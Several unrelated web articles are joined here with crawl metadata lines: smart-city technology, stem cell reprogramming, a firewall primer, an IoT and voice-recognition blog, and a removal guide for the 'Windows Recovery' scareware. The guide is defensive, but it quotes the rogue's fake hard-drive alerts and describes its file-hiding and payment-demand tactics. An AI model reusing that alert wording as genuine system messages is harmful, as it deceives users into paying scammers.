So what to do? Going forward, the GAO recommended that the FCC encourage the private sector to implement a broad, industry-defined baseline of mobile security safeguards. GAO also recommended that DHS and NIST take steps to better measure progress in raising national cybersecurity awareness. The FCC, DHS, and NIST generally concurred with GAO’s recommendations. | <urn:uuid:fccf9cbc-d382-4001-9ae6-7bc9be3cc2fc> | CC-MAIN-2017-09 | https://www.infosecurity-magazine.com/news/mobile-malware-up-185-amid-a-lack-of-consumer/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00647-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950225 | 644 | 2.71875 | 3 |
Self-driving electric taxis, smart appliances and municipal solar power are all amenities enjoyed by the residents of the futuristic Masdar City in the Middle East. Here's how they'll make their way to the U.S.
On the outskirts of Abu Dhabi on the Persian Gulf, just southeast of Qatar and not far from Iran, a sparkling new metropolis called Masdar City is rising in the desert. The Abu Dhabi Future Energy Company began construction of Masdar in 2008, and so far the site features one major street and a few residential and research buildings in its tech institute, and it has grand intentions of becoming the first municipality powered entirely by renewable energy sources.
Americans might have expected Silicon Valley to lead such a charge, but City 2.0 is emerging halfway across the world.
In Masdar City, a personal rapid transport system buzzes passengers from one building to another in driverless "robotaxis." (The city does not allow any personal automobiles.) A solar power plant heats the city's water and provides electricity to a water treatment facility. Every electrical outlet in the city is monitored, and the total municipal power usage is reported on a water tower standing in the city center. Smart meters, connected into a smart grid, know all kinds of details about power usage -- such as when a dryer is running too long.
Designed by the British architects Foster + Partners as a showcase for sustainable architecture and engineering, the city is expected to have 40,000 residents when it's fully built in 2025. While few if any American cities have the financial equivalent of the Abu Dhabi government's deep pockets to bankroll investments in energy-saving infrastructure, some of Masdar's cutting-edge energy technologies -- smart appliances in the home, renewable energy sources, and clean, self-driving personal transit -- may be coming to a city near you. Here's how these urban technologies are evolving in the United States.
The dishwasher in your kitchen is not that smart. Sure, some models let you program a wash cycle for late at night when electricity rates are low. But they can't read and respond intelligently to your electric meter -- a capability that would make it possible to, for instance, have them automatically turn on when the rates during the day are at their lowest.
One of the key problems, says John Millberg, an energy manager with the Minneapolis city government, is that many utilities don't offer tiered cost structures during the day. So even if homes were equipped with smart appliances and smart meters, there would be no incentive to do more to manage power usage than choosing between running appliances during the day or at night. Moving to a tiered structure would require a mandate from the city's public utilities commission, he says.
Texas and California are two states that do have tiered pricing. That's why Texas-based Reliant Energy started a pilot program with a few General Electric employees in Houston to try out smart appliances. Each test appliance -- including water heaters, dishwashers and clothes dryers -- has a communications module that uses the ZigBee wireless protocol, says Wayne Morrison, the manager of smart energy partnerships at Reliant, who is in charge of the pilot. The modules connect to a smart meter that reports exact usage back to the utility in real time.
If the customer allows it, the utility can automatically send a command to the appliance to run during a specific time of the day, Morrison says. (Of course, appliances have to be prepped for the automatic schedule with soap and dishes -- at least until we all have robomaids.) Reliant offers pilot customers a Web portal where they can see how much energy they used during the day and view reports about usage over a few days or weeks. The company also sends emails to let them know about their energy savings.
In the next decade, smart appliances will be able to send diagnostic information to the utility and even send a message to a repair technicians automatically, says Morrison. Some of the latest home appliances, like the Samsung RSG309 Wi-Fi Refrigerator, can use Wi-Fi over home routers today, but future models could tap into the grid directly, he says. For now, they can run apps in a touchscreen display to show things like weather forecasts, schedules of upcoming family events or recipes.
John H. Desmarais, a development manager at GE, says smart appliances can reduce energy use in a home by up to 20%. And appliances are just the start, he says: Once the U.S. adopts a widespread "smart grid" that lets utilities and homeowners access heating and cooling systems remotely, a smart thermostat, tied into the smart grid, could reduce energy use even more, since cooling and heating are responsible for 28% of home energy use.
Desmarais envisions a day when every device in the home will connect to a smart grid. GE has developed a software platform for home energy management called Nucleus that's designed to plug into the smart grid of the future. The grid is not widespread yet, but in the meantime, there are products that take advantage of existing technologies to give people more control over when their appliances run and when they don't. For example, a company called Nest Labs offers a smart thermostat that connects to your home Wi-Fi network and lets you adjust temperature settings using an iPhone or schedule automatic temperature increases or decreases via the Web.
In the home of the future, the smart grid may connect to your appliances, your lights, your air conditioning system and the electric car in your garage. Credit: General Electric.
Unlike in Masdar -- a newly constructed metropolis where a smart grid can be implemented by fiat -- adoption of smart appliances in the U.S. likely faces a tough road, says Bob Gohn, an analyst at Pike Research. "There are a number of pieces of the puzzle that have to come together before smart appliances make sense from an energy perspective," he says -- standards need to be approved, utilities need to create tiered pricing plans, and smart meter technology needs to evolve.
The big hurdle, he says, is that a smart appliance has to integrate into a home's smart grid, called a home area network (HAN). The ZigBee standard ran into a roadblock in 2009, says Gohn, because the first iterations used a proprietary protocol, not the more standard TCP/IP.
Lately, Gohn says, ZigBee has started to adhere to standards like those being developed by the National Institute of Standards and Technology that govern smart grid device interoperability and power use. The Smart Energy Profile 2.0, a set of TCP/IP-compliant standards developed by ZigBee for controlling and monitoring water and energy use in the home, is nearing approval, but Gohn says compatible devices won't be available until 2013.
Another factor holding back the adoption of smart appliances and smart grids is what Gohn and other industry watchers call the "Bakersfield effect" -- distrust of smart meters by consumers and consumer advocates. In 2009, the California utility Pacific Gas and Electric (PG&E) conducted a pilot test of smart meters in Bakersfield, Calif., during which a perfect storm of rate increases, record temperatures and other factors caused utility bills to go way up, not down. As a result, state legislators blocked future smart grid deployments temporarily, although some California cities including San Francisco are now starting to deploy them.
Ironically, says Gohn, later analysis showed that the smart meters did track power usage more effectively. The problem, he explains, is that the new meters are extremely accurate. Older meters tend to fudge how much energy a home is using, to the advantage of the homeowner. But replacing them is better for the environment, because they more accurately reflect your energy usage and can show you where to make adjustments to reduce your energy consumption (for example, by suggesting that you turn down the heat at night). And if you do make such adjustments, they could ultimately lower your energy costs, even if your costs go up initially.
Eventually homeowners and municipalities will see the value of smart meters, says Gohn. He predicts that smart appliances will become popular by 2014, at which point adoption rates will begin to grow by 40% to 50% per year.
Personal, autonomously driven rapid transport
In late June 2011, the state of Nevada passed a law that would allow driverless cars on its roads, pending the Department of Motor Vehicles' development of regulations governing how the cars should operate on public highways. Those regulations were approved in February.
California looks to be headed in the same direction: The state senate in May approved a bill that would establish standards governing autonomously operated vehicles. Other states, including Arizona, Hawaii, Florida and Oklahoma, are considering similar legislation, according to the Los Angeles Times.
Already, Google has put specially outfitted self-driving Toyota Prius models through test drives that covered 140,000 miles in northern California. A driver was always on hand to take over during the test drives, and there was only one minor fender-bender during the pilot, and it was caused by human error. Autonomous driving could cut the number of accidents in half, says Sebastian Thrun, a Google engineer.
Of course, having one car drive you to work is one thing. In Masdar City, thousands of people ride in autonomous cabs that run on electric power and read markers on the road for navigation. There is no need for remote charging stations, because the cabs power up at a car terminal while waiting for people to load. There are now 10 taxis in operation, carrying about 25,000 passengers per month, according to 2GetThere, the company that developed the Masdar City robotaxis.
Robotaxis transport about 25,000 people per month in Masdar City. There are currently 10 vehicles in the fleet. Credit: 2GetThere.
There have been no reported accidents since the Masdar City taxis launched in December 2010, according to 2GetThere spokesman Robbert Lohmann, who says autonomous cars for public transit make sense in Masdar City because the road infrastructure is dedicated to the driverless cabs. "The chances of two vehicles coming into contact with each other are extremely remote," he says. "The predictable behavior of automated systems ensures that the random character of accidents as we experience them with manually driven vehicles, such as personal cars or trains, will be avoided."
What about on U.S. roads at highway speeds? Marcial Hernandez, a senior engineer at automaker Volkswagen, says the sensor technology needed for autonomous cars on highways is already available. Many cars can sense when another vehicle passes or automatically slow down to maintain a proper distance from the vehicle ahead of you on the highway (thanks to a technology called adaptive cruise control). A few models, like the Infiniti G, can nudge you back into a lane when your car gets too close to the shoulder.
In a recent research project, Hernandez says, VW developed a feature called Temporary Auto Pilot that uses such sensors and also controls steering. And Cadillac says it's road-testing a similar technology called Super Cruise that allows the driver to take his or her hands off the wheel for short periods of autonomous highway driving.
With Cadillac's Super Cruise technology, the car watches lane markings on the highway to control your speed and position in the lane for hands-free driving. Credit: Cadillac.
These features require advanced LIDAR (Light Detection and Ranging) sensors, which are sensitive enough to detect curbs and small objects, Hernandez explains. Often found in luxury cars today, LIDAR is still too expensive to be included in many low-end vehicles, Hernandez says. That's changing quickly, though; some lower-cost vehicles, such as the Ford Taurus, are equipped with LIDAR. But until every car uses the technology, it may be hard for autonomous driving to gain traction.
Another issue hindering the adoption of driverless cars in the U.S., Hernandez says, is that the traffic infrastructure is not yet ready. A driverless car could speed down the highway, but today it wouldn't know a simple condition such as whether a traffic light is green or red, or if a parking space is available at the mall. For robotaxis to be viable, a city would need to build a wireless infrastructure that communicates all of this information to the cars.
"The biggest problem is that robotaxis require infrastructure investments and changes to create a reliable foundation," says Thilo Koslowski, an auto industry analyst at Gartner, who says U.S. consumers are in favor of autonomous cars. "Ideally, autonomous vehicles will be connected 24/7 with traffic management networks to optimize routing and congestion levels. These cars can also function as traffic probes to collect speed and congestion information."
The National Highway Transportation Safety Administration (NHTSA) is taking some initial steps toward building more-connected roadways. It will conduct a yearlong test of vehicle-to-vehicle communications technology in Ann Arbor, Mich., starting this fall. Test cars will connect to each other and to the road to be alerted to imminent crash situations, construction zones and more. The use of such wireless communications systems could lead to an 80% reduction in accidents, according to the NHTSA. | <urn:uuid:b99da5b0-70e9-4c9a-899e-3d6c59aead87> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2189549/data-center/urban-tech--from-masdar-to-main-street-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00347-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.95336 | 2,715 | 2.609375 | 3 |
Embryonic stem cells (ESCs) have the potential to develop into any tissue, and thus hold promise for repair of damaged organs. Part of that potential comes from being a perfect tissue match to the person in need of repair, but this assumes that ESCs can be made from adults, a process that currently requires using a process that's disturbingly close to human cloning. The alternatives, however, are also problematic. Human ESCs exist, but they will not be perfect matches to patients, and there are restrictions on working with them while using government funding and some ethical concerns regarding their creation. Although adult stem cells exist, they are partly specified, and may not be able to form every tissue that needs repair. In addition, some adult stem cells exist in small populations that reside in hard-to-reach locations—nobody's going to dig around in the heart or interior of the brain of a patient in order to pull out a few stem cells.
In an ideal world, we'd simply convert cells from adult patients directly into stem cells without doing anything resembling cloning along the way. Working in mouse cells, a pair of researchers from Kyoto have apparently done just that. The researchers built on the extensive characterization of stem cells, both human and mouse, that have been performed recently. They first dropped a drug resistance gene into a locus that's expressed in ESCs, so that when cells were cultured with the drug, only those with ESC-like gene expression would survive. Next, they scanned the literature for any gene that is expressed in ESCs, and chose a panel of 24 genes that were known regulators of stem cell formation or embryonic development.
They first introduced these genes individually into mouse cells, but none of the resulting lines were drug resistant. Dumping all 24 in at once, however, produced several cell lines, several of which appeared to be ESCs by a number of assays. The scientists then went through and eliminated one gene at a time from the pool, whittling it down to 10 genes. They repeated this Survivor-like process with the pool of 10, and eventually came up with four genes: Oct3/4, Klf4, Sox2, and c-Myc. Transfection of mouse cells with these four was sufficient to convert them to ESCs.
Gene expression analysis using DNA chips showed that the resulting cells were most similar to ESCs, and no longer resembled the parental cell line. In a number of culture systems, the cells could form a huge range of adult cell types, and could form embryoid bodies when injected into adult mice. But the key test came when they labelled these ESCs with a fluorescent tag and injected then into recently fertilized mouse embryos at a time when the embryos were a small cluster of cells. The progeny of the engineered ESCs glowed green, and were found in every tissue in these embryos as they developed, as well as throughout adults. There seems to be little that's different between regular ESCs and the engineered ESCs.
There are still some question as to what exactly is going on with these cells. The efficiency of conversion to ESCs is very low, but it is unclear what limits it. A second question is why, if these cells still carried the extra copies of these four genes, could they ever differentiate into normal cells? Shouldn't they remain ESCs? The technique is also not ready for use in humans, and not only because it's not been tried with human cells. The technique involved in introducing the genes used retroviruses that inserted randomly into the genome—not generally a safe technique. Still, this appears to be an important first step, and you can bet that many labs will be interested in following up on these results. | <urn:uuid:320ff360-bd76-40ff-9cfc-b9ed004b00c1> | CC-MAIN-2017-09 | https://arstechnica.com/science/2006/08/5112/?comments=1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00347-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.977384 | 758 | 3.671875 | 4 |
Enterprise Perimeter Security and Firewall Systems
The perimeter of the enterprise and the first line of defense, firewall systems, are vital to the security of any business. The perimeter of the enterprise establishes the boundary between the inside of the business and the outside. While businesses are vulnerable to insider and outsider threats—both of which are significant—the enterprise perimeter and the firewall system are designed to protect the inside from outsider attacks.
So how do you secure your internal network from an external network, such as the Internet? One potential solution is to set up a firewall system. A firewall is designed to keep intruders from getting into your internal network.
A firewall is one or more systems, which may be a combination of hardware and software, that serve as a security mechanism to prevent unauthorized access between trusted and untrusted networks.
Firewall systems are typically the first line of defense between an organization’s internal network and its connection to the Internet. Firewall systems are typically the primary tool used to enable an organization’s security policy to prevent unauthorized access between networks. An organization may choose to deploy one or more systems that function as firewalls.
A firewall refers to a gateway that restricts the flow of information between the external Internet and the internal network. The trusted internal network may include several LAN and WAN subnets—a firewall is a system or systems that separate an autonomous network from the external network. Firewalls may be internal or external.
Firewall systems can protect against attacks that pass through network interfaces. Firewall systems cannot protect against attacks that do not pass through the firewall.
For example, consider an organization’s internal network, which may include several LAN and WAN subnets. The WAN subnets may be used to provide connectivity to the corporate network. Thus, technologies such as frame relay, ISDN or dedicated point-to-point circuits (56 kbps, fractional T-1, T-1, T-3) may be used to provide connectivity between branch offices and the corporate network. If access to the Internet is through a router on the corporate network and that is where the firewall system architecture is defined, it is possible for the firewall system to control inbound and outbound access to the Internet on the basis of filters (rules) that have been defined.
Types of Firewalls
There are several types of firewall systems. These include:
- Packet-filtering firewalls
- Stateful-inspection firewalls
- Application-proxy gateway firewalls
A packet-filter firewall is a lower-layer firewall device that includes access-control functionality for system addresses and communication sessions. An example of a packet-filtering firewall system is a boundary router. This typically is deployed on the “edge” of the enterprise network. Its advantages are that it is fast and flexible. It can filter out unwanted protocols, perform simple access control and then pass data to other, more advanced firewalls.
Stateful-inspection firewalls represent a superset of packet-filter firewall functionality. These firewalls can interpret and analyze the information in layer-four headers (transport layer). The firewall creates a directory of outbound TCP connections along with each session’s “high-numbered” client port. This state table information is used to validate any inbound traffic.
Application-proxy gateway firewalls are highly advanced firewalls that combine the capabilities of access control provided at the lower layers with application layer functionality. Typically, these have extensive logging capabilities and can authenticate users directly. These devices are less vulnerable to spoofing attacks.
Firewall systems sometimes provide an organization with centralized control in today’s highly decentralized computing environment. This implies that security tools for logging events, auditing transactions and defining alarms for threats detected can all be defined and controlled centrally as a part of the firewall system.
In large, multifaceted organizations that are made up of more or less “independent” subsidiaries, centralized firewall controls may not be in place. Rapid consolidation of some businesses has been facilitated by continual merger-and-acquisition activity. This has left some large organizations with numerous connections to external data communications networks, each having some level of firewall infrastructure, yet without effective coordination. This presents such organizations with a significant risk—consider the “hacker” saying, “You have to plug every real and probable hole across your organization, but I only need to find and exploit one to win.”
Also, keep in mind that a firewall infrastructure must perform an incredibly difficult task. Remember when we said above, “A firewall is designed to keep intruders from getting into your internal network.” That is absolutely true. The problem is that firewalls must also pass data traffic.
At the traffic flow—or network—level, all communications tend to look the same. Consider, for example, the standard TCP/IP session that consists of the three-way handshaking process, transfer of data and then the session teardown. Many modern firewalls can be configured to disallow session initiation from one or another side of the network boundary layer.
Some firewalls can also detect and drop (or reject/deny) malicious attempts to send “mid-session” TCP/IP frames into a network from the outside. (This technique can be used to help map the resources that are available inside your network.)
Other firewall infrastructures may sometimes include programs called “proxies” that accept traffic destined for “the other side of the firewall” and examine the higher-level details of specific application communications and then either pass valid traffic along to the intended destination or drop (or reject/deny) malicious or otherwise inappropriate activity.
Risk-conscious companies are installing systems that are able to identify a wide range of malicious activities. The systems react by initiating actions that will help employees effectively deal with the threat. Today’s firewall systems protect sites from vulnerabilities in the TCP/IP protocol suite. They are also able to integrate capabilities that can not only provide access control on TCP/IP packets, but also filter the content of traffic entering or leaving the enterprise.
Some examples of firewall vendors include Check Point, Cisco and SonicWALL. Firewall systems require expert knowledge to implement and configure. Most security certification programs, as well as those offered specifically by firewall vendors, include training designed to acquire skills to deploy firewalls successfully.
Each organization must defend its perimeter—its connections with the outside world. Firewall systems are the first line of defense. The design of the firewall system architecture, the selection of the firewall solution that meets your enterprise requirements and the configuration and management of the system will be critical to “close and lock” entry and exit points.
Security is only as strong as the weakest link—firewall systems can help make your enterprise security architecture a lot more formidable at the perimeter.
Uday O. Ali Pabrai, CEO of ecfirst.com, created the CIW program and is the co-creator of the Security Certified Program (www.securitycertified.net). Pabrai is also vice-chair of CompTIA’s Security+ and i-Net+ programs and recently launched the HIPAA Academy. E-mail him at email@example.com. | <urn:uuid:a5cc45e4-cba9-43ef-a7f0-79d116196529> | CC-MAIN-2017-09 | http://certmag.com/enterprise-perimeter-security-and-firewall-systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00047-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.930395 | 1,521 | 3.03125 | 3 |
Technology Frontiers – IoT and Voice Recognition
We previously wrote about some of the technology frontiers we are exploring, and described three that are exciting:
- 3D Printing
- Clustered Computing
- Latest Applications, Operating Systems, and Devices
But much like exploring a new area untouched before, we have two more that are both exciting and showing real promise for the future of technology and how it affects our lives. These are the Internet of Things (IoT) and Voice Recognition, especially when paired with artificial intelligence and machine learning. We describe both of these in this article.
Internet of Things (IoT)
The Internet was originally an environment where we hooked our computers to the internet provider and started using email or the world wide web (WWW). Humans were clicking links, watching a video, and sending an email. We initiated the majority of traffic by our explicit and direct actions, predominately in a web browser.
But the use of the Internet as a super-highway for information has changed: now devices and things are generating most of the traffic that is zipping through our data lines. In fact, Cisco did a study that estimated that “Data created by IoT devices will hit 507.5 ZB per year by 2019, up from 134.5 ZB in 2014.” (source: ZdNet Article: http://www.zdnet.com/article/cloud-traffic-to-surge-courtesy-of-iot-says-cisco/). In case you are wondering, a “ZB” is a Zetabyte, or 1 billion terabytes – and that is a lot!
So what is the Internet of Things (hereafter abbreviated “IoT”)? It is the accumulation of the devices that are connected to the internet and generating (and sending) or receiving data. It is sometime analogous to Machine to Machine communication (M2M, no humans involved). Some examples:
- Your cell phones’ GPS coordinates while you are using maps
- A Nest thermostat in your home that you can connect to and raise the temperature, and which “learns” your life’s patterns to automatically start managing the system based on your history.
- A location based tracking beacon to show you where your keys were left behind.
- Public trash cans that use real-time data collection and alerts to let municipal services know when a bin needs to be emptied.
- Wireless sensors embedded within concrete foundations to ensure the integrity of a structure; these sensors provide load and event monitoring both during and after construction.
- Activity sensors placed on an elderly loved one that monitor daily routines and give peace of mind for their safety by alerting you to any serious disruptions detected in their normal schedule.
- And so many more…
In every case it is some device that is communicating data, not a person directly doing so.
Based on the utility as well as the total data being collected, we can quickly see where this can explode. Instead of you personally collecting and transmitting data, a device will do this for you. It is in effect what everybody dreams about when you think that your refrigerator will send a list to the local grocery store for items to replenish (and by the way Amazon now offers a “Dash button” that is designed to order some common household items at the push of a button).
We are using Voice Recognition more and more every day, in applications like Apple Siri or Google Now, or when we call into an automated messaging attendant at an insurance company and say our date of birth or policy # to a computer, or use voice to text capabilities. You have likely used one of these recently, but never really thought about it. It has become commonplace, but is expanding to be an option of choice for interacting with data.
Like most people, I interact with a lot of email; usually between 100-200 legitimate emails per day that are critical. Although I am sitting at a PC, I tend to grab my iPhone and use the microphone key to answer emails using my voice. A quick press and I am orally stating my response, or sending a new email. I also use Dragon products on both Windows and Macintosh OSX to generate larger documents. In fact, this article is about 95% voice generated on a Windows laptop with Dragon Naturally Speaking. I use it to dictate the text, select text and apply formatting like bold or italics, and other advanced capabilities. I confess that I do not type very well (if only I would have joined the mostly female typing class in my high school!), so the ability to use my voice is a tremendous advantage. It is not only a convenience; it is a huge productivity boost; I have generated documents of thousands of words in an afternoon.
And while I love the ability to simply state my words and see them appear in an email or Word document, when I see them combined with artificial intelligence such as Siri or Microsoft Cortana, it provides a truly personal digital assistant – one that knows what I am looking for. Here are some examples.
- On my iPhone, I long press the home button and Siri pops up, and I say “When do the Cleveland Browns play?”, and Siri responds orally and on screen with the opponent and date/time of the next game.
- On my Windows 10 PC I ask the same question and Cortana (the Microsoft voice persona) answers the same basic info, but on screen she also shows the probability of victory for the Pittsburgh Steelers at a 70.2% chance today :(. And by the way, Cortana has been 140-84 through 16 NFL weeks.
- On my Windows PC, I can ask “what documents did I work on today?” with my voice, and see a list of everything.
- On my iPad, I can ask “What is my schedule tomorrow?” and see and hear a list of my appointments.
- On almost any device, I can ask, “what is the temperature over the next 3 days?” and get a nice forecast for the next three days (it is getting colder…brrr…).
- On my iPhone, I long press the home button, and say “Remind me to let the dogs in in 10 minutes” and a reminder is created that dutifully goes off 10 minutes later.
- On my Android tablet I say “Ok Google”. Then “email to John Smith”, “subject Client X need”, “Message We need to call them back today” and it sends an email with that info to John on my team.
In other words, I can ask questions that are personal to me (what is my schedule?) or from my world (“what is the temperature over the next three days?”) and get a context specific reply. Or I can give instructions to do something I need (“remind me in 10 minutes to let the dogs in”). It seems like I am asking a human who knows what I want, and they give me a reply that is appropriate for the context in which I asked.
These functions are easy to use, and I highly recommend that you try them out. If you want a place to start, try one of the following:
- On your Windows 10 PC, click the Cortana microphone and says “Help Me Cortana”, she will show a list of suggested capabilities to get you started.
- Try the same thing on your iPhone, hold down the home button until it responds, and says “Help me Siri” to get a list of suggested actions (you can also configure it to respond to “Hey Siri).
- On an Android device, try saying “Ok Google”, then say “help”
What you can see is that your devices can interact with you on your terms. It is not perfect, sometimes we see the famous and usually funny (and sometimes embarrassing) auto-correct responses when we use our voice, but overall it is really working quite well.
Summary of Technology Frontiers
There are waves of technology shifts that represent new frontiers for users and business organizations, and each represents some questions: What is this? How can it help me? What are the risks? We are looking at these so you know we have an eye on what may make a difference for you!
This week, some of us from Keystone will be at the Consumer Electronics Show (CES) in Las Vegas, which is the largest expo of technology directed at consumers and organizations that serve them. We are excited to continue to dig in and see what is coming down the road that will affect all of our lives!
3 Responses to “Technology Frontiers – IoT and Voice Recognition”| |
Leave a Reply | <urn:uuid:1ef384ad-7594-4d59-a746-bcae4567d083> | CC-MAIN-2017-09 | http://www.keystonecorp.com/technology-frontiers-part-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00467-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940865 | 1,833 | 3.015625 | 3 |
Windows Recovery is a fake computer analysis and optimization program that displays fake information in order to scare you into believing that there is an issue with your computer. Windows Recovery is installed via Trojans that display false error messages and security warnings on the infected computer. These messages will state that there is something wrong with your computer's hard drive and then suggests that you download and install a program that can fix the problem. When you click on of these alerts, Windows Recovery will automatically be downloaded and installed onto your computer.
Once installed, Windows Recovery will be configured to start automatically when you login to Windows. Once started, it will display numerous error messages when you attempt to launch programs or delete files. Windows Recovery will then prompt you to scan your computer, which will then find a variety of errors that it states it cannot fix until you purchase the program. When you use the so-called defragment tool it will state that it needs to run in Safe Mode and then show a fake Safe Mode background that pretends to defrag your computer. As this program is a scam do not be scared into purchasing the program when you see its alerts.
To further make it seem like your computer is not operating correctly, Windows Recovery will also make it so that certain folders on your computer display no contents. When opening these folders, such as C:\Windows\System32\ or various drive letters, instead of seeing the normal list of files it will instead display a different folder's contents or make it appear as if the folder is empty. This is done to make it seem like there is corruption on your hard drive that is causing your files to not be displayed. It does this by adding the +H, or hidden, attribute to all of your files, which causes your files to become hidden. It will then change your Windows settings so that you cannot view hidden and system files. Once the rogue's processes are terminated you can enable the setting to view hidden files, and thus be able to see your files and folders again, by following the instructions in this tutorial:
Windows Recovery also attempts to make it so you cannot run any programs on your computer. If you attempt to launch a program it will terminate it and state that the program or hard drive is corrupted. It does this to protect itself from anti-virus programs you may attempt to run and to make your computer unusable so that you will be further tempted to purchase the rogue. The messages that you will see when you attempt run a program are:
Hard Drive Failure
The system has detected a problem with one or more installed IDE / SATA hard disks. It is recommended that you restart the system.
An error occurred while reading system files. Run a system diagnostic utility to check your hard disk drive for errors.
Hard drive critical error. Run a system diagnostic utility to check your hard disk drive for errors. Windows can't find hard disk space. Hard drive error.
After you close this alert you will be presented with another alert that pretends to be for a program that will attempt to fix your hard drive.
Windows Recovery Diagnostics will scan the system to identify performance problems.
Start or Cancel
If you press the Start button, it will pretend to scan your computer and then state that there is something wrong with it. This message is:
Windows Recovery Diagnostics
Windows detected a hard disk error.
A problem with the hard drive sectors has been detected. It is recommended to download the following sertified <sic> software to fix the detected hard drive problems. Do you want to download recommended software?
These are just further alerts trying to make you think your computer has a serious hard drive problem. It should be noted that if you attempt to run a program enough times it will eventually work.
When you perform the scan or use the fake Windows Recovery it will state that there are numerous problems on your computer, but that you first need to purchase it before it can fix any of them. Some examples of the fake problems it detects on your computer are:
Requested registry access is not allowed. Registry defragmentation required
Read time of hard drive clusters less than 500 ms
32% of HDD space is unreadable
Bad sectors on hard drive or damaged file allocation table
GPU RAM temperature is critically high. Urgent RAM memory optimization is required to prevent system crash
Drive C initializing error
Ram Temperature is 83 C. Optimization is required for normal operation.
Hard drive doesn't respond to system commands
Data Safety Problem. System integrity is at risk.
Registry Error - Critical Error
While WindowsRecovery is running it will also display fake alerts from your Windows taskbar. These alerts are designed to further scare you into thinking that your computer has an imminent hardware failure. The text of some of the alerts you may see include:
Damaged hard drive clusters detected. Private data is at risk.
Hard Drive not found. Missing hard drive.
RAM memory usage is critically high. RAM memory failure.
Windows can't find hard disk space. Hard drive error
Windows was unable to save all the data for the file \System32\496A8300. The data has been lost. This error may be caused by a failure of your computer hardware.
A critical error has occurred while indexing data stored on hard drive. System restart required.
The system has been restored after a critical error. Data integrity and hard drive integrity verification required.
Windows Recovery Activation
Advanced module activation required to fix detected errors and performance issues. Please purchase Advanced Module license to activate this software and enable all features.
Low Disk Space
You are running very low disk space on Local Disk (C:).
Windows - No Disk
Exception Processing Message 0x0000013
Just like the fake corruption messages and fake scan results, these alerts are only designed to scare you into purchasing the program.
As you can see, the warnings issued by this program are all fake, and once you realize that, the alerts become more of a nuisance rather than a concern. Therefore, do not purchase WindowsRecovery for any reason, and if you already have, please contact your credit card company and state that the program is a computer infection and a scam and that you would like to dispute the charge. To remove this infection and related malware, please follow the steps in the guide below.
Self Help Guide
- Print out these instructions as we may need to close every window that is
open later in the fix.
- It is possible that the infection you are trying to remove will not allow
you to download files on the infected computer. If this is the case, then
you will need to download the files requested in this guide on another computer
and then transfer them to the infected computer. You can transfer the files
via a CD/DVD, external drive, or USB flash drive.
- Before we can do anything we must first end the processes that belong to
so that it does not interfere with the cleaning procedure. To do this, please
download RKill to your desktop from the following link.
RKill Download Link - (Download page will open in a new tab or browser window.)
When at the download page, click on the Download Now button labeled iExplore.exe download link. When you are prompted where to save it, please save it on your desktop.
- Once it is downloaded, double-click on the iExplore.exe
icon in order to automatically attempt to stop any processes associated with
and other Rogue programs. If you cannot find the iExplore.exe icon that you
downloaded, you can also execute the program by doing the following steps
based on your version of Windows:
For Windows 7 and Windows Vista, click on the Start button and then in the search field enter %userprofile%\desktop\iexplore.exe and then press the Enter key on your keyboard. If you Windows prompts you to allow it to run, please allow it to do so.
For Windows XP, click on the Start button and then click on the Run menu option. In the Open: field enter %userprofile%\desktop\iexplore.exe and press the OK button. If you Windows prompts you to allow it to run, please allow it to do so.
Please be patient while the program looks for various malware programs and ends them. When it has finished, the black window will automatically close and you can continue with the next step. If you get a message that RKill is an infection, do not be concerned. This message is just a fake warning given by Windows Recovery when it terminates programs that may potentially remove it. If you run into these infections warnings that close RKill, a trick is to leave the warning on the screen and then run RKill again. By not closing the warning, this typically will allow you to bypass the malware trying to protect itself so that rkill can terminate Windows Recovery . So, please try running RKill until the malware is no longer running. You will then be able to proceed with the rest of the guide. If you continue having problems running RKill, you can download the other renamed versions of RKill from the rkill download page. All of the files are renamed copies of RKill, which you can try instead. Please note that the download page will open in a new browser window or tab.
Do not reboot your computer after running RKill as the malware programs will start again.
- At this point you should download Malwarebytes Anti-Malware, or MBAM, to scan your computer for any any infections or adware that may be present. Please download Malwarebytes from the following
location and save it to your desktop:
Malwarebytes Anti-Malware Download Link (Download page will open in a new window)
- Once downloaded, close all programs and Windows on your computer, including
- Double-click on the icon on your desktop named mb3-setup-1878.1878-220.127.116.119.exe.
This will start the installation of MBAM onto your computer.
- When the installation begins, keep following the prompts in order to continue
with the installation process. Do not make any changes to default settings
and when the program has finished installing, make sure you leave Launch
Malwarebytes Anti-Malware checked. Then click on the Finish button. If MalwareBytes prompts you to reboot, please do not do so.
- MBAM will now start and you will be at the main screen as shown below.
Please click on the Scan Now button to start the scan. If there is an update available for Malwarebytes it will automatically download and install it before performing the scan.
- MBAM will now start scanning your computer for malware. This process can
take quite a while, so we suggest you do something else and periodically
check on the status of the scan to see when it is finished.
- When MBAM is finished scanning it will display a screen that displays any malware that it has detected. Please note that the infections found may be different
than what is shown in the image below due to the guide being updated for newer versions of MBAM.
You should now click on the Remove Selected button to remove all the seleted malware. MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so. Once your computer has rebooted, and you are logged in, please continue with the rest of the steps.
- You can now exit the MBAM program.
- This infection family will also hide all the files on your computer from
being seen. To make your files visible again, please download the following
program to your desktop:
Once the program has been downloaded, double-click on the Unhide.exe icon on your desktop and allow the program to run. This program will remove the +H, or hidden, attribute from all the files on your hard drives. If there are any files that were purposely hidden by you, you will need to hide them again after this tool is run.
- Finally, as many rogues and other malware are installed through vulnerabilities
found in out-dated and insecure programs, it is strongly suggested that you
use Secunia PSI to scan for vulnerable programs on your computer. A tutorial
on how to use Secunia PSI to scan for vulnerable programs can be found here:
How to detect vulnerable and out-dated programs using Secunia Personal Software Inspector
